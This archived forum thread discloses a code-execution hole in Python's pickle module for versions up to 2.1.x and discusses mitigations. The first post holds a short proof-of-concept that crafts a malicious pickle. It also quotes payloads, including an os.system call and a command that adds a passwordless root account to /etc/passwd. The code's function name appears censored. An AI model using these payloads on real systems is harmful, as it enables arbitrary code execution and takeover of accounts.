Exploit for a security hole in the pickle module for Python versions <= 2.1.x 
Author Message
 Exploit for a security hole in the pickle module for Python versions <= 2.1.x

"""
Exploit for a security hole in the pickle module for python versions <= 2.1.x

Pickle is the name of a Python module for object persistence.  It can convert
arbitrary Python objects into byte streams and back.  Though the documentation
for Python 1.5.2 read
    The pickle module doesn't handle code objects, which the marshal
    module does. I suppose pickle could, and maybe it should, but there's
    probably no great need for it right now (as long as marshal continues
    to be used for reading and writing code objects), and at least this
    avoids the possibility of smuggling Trojan horses into a program.
it was always generally considered that a carefully-crafted "pickle" could
execute arbitrary code.

In Python 2.0, one hole was closed which was due to the use of eval() to
unpickle a string.  This hole could be exploited with a pickle string like
    "S''*__import__('os').system('echo 0wn3d')\np0\n."

In Python version 2.2, a new restriction was added to unpickling of
instances: when unpickle would have called a constructor, the class
must define an attribute __safe_for_unpickling__ with a true value,
or an exception will be raised.  Because a "class constructor" is
simply a callable object, a pickle can be written that names any function
and gives it arbitrary arguments.  Thus, a specially crafted pickle might
contain the instruction
    instantiate the class os.system with the argument
        "echo r00t::0:0::/:/bin/sh >> /etc/passwd"

Many major Linux distributions still ship with Python 1.5.2, which is
vulnerable to both of these types of exploits.  Some ship with 2.0 or 2.1,
usually in addition to 1.5.2.  These versions are vulnerable to the second
type of exploit.  I don't know of a Linux distribution which ships with
only python 2.2, which is free from both these problems.  However,
I know of no particular uses that lead to a direct security breach.
"""

import pickle, new

def {*filter*}(module, function, *args):
    return pickle.dumps(new.classobj(function, (), {
        '__getinitargs__': lambda self, arg = args: arg,
        '__module__': module
    }) ())

# Create the evil pickle
t = {*filter*}("__builtin__", "open", "/tmp/pickle-bug", "w")
# Show the user how it looks
print repr(t)
# Now, load the pickle -- creates the file /tmp/python-is-buggy (by calling
# the builtin open() function, then raises an exception.  But the damage is
# done...
pickle.loads(t)



Sun, 02 Jan 2005 20:47:14 GMT  
 Exploit for a security hole in the pickle module for Python versions <= 2.1.x

Quote:
> Exploit for a security hole in the pickle module for Python versions <= 2.1.x

Thank you for the precise problem statement!
Quote:
> ...
> Because a "class constructor" is
> simply a callable object,
> a pickle can be written that names any function
> and gives it arbitrary arguments.

But this need not be the case!

   A "class constructor" is quite a special "function".
   Its "type" is "ClassType" (at least until Python 2.2).

Dieter



Tue, 04 Jan 2005 03:07:53 GMT  
 Exploit for a security hole in the pickle module for Python versions <= 2.1.x

Quote:


> > Exploit for a security hole in the pickle module for Python versions <= 2.1.x
> Thank you for the precise problem statement!
> > ...
> > Because a "class constructor" is
> > simply a callable object,
> > a pickle can be written that names any function
> > and gives it arbitrary arguments.
> But this need not be the case!

>    A "class constructor" is quite a special "function".
>    Its "type" is "ClassType" (at least until Python 2.2).

This test would "work" against the exploit I posted.  However, this test
is not implemented in any version of Python.  Furthermore, there are
classes which are unsafe to instantiate.  For instance, popen2.Popen3
is as dangerous a constructor as os.system is a function.

Quote:
>>> type(popen2.Popen3)

<type 'class'>

That's the reason the "safe for unpickling" requirement was added.

Jeff



Tue, 04 Jan 2005 04:45:30 GMT  
 
 [ 3 post ] 

 Relevant Pages 

1. Is this a known security hole with pickle?

2. New security exploit combination, I think

3. PSS Security Alert - JS/Exploit-Messenger

4. Windows 2000 security hole

5. Interbase security hole, er, gaping chasm

6. A security hole

7. no security hole??

8. ADVICE <<<<<<<<<<<<<<<<<<<-----------EASY ---------------

9. Security hole in rexec?

10. Security Hole?

11. What are security holes?

12. What are security holes?

 

 
Powered by phpBB® Forum Software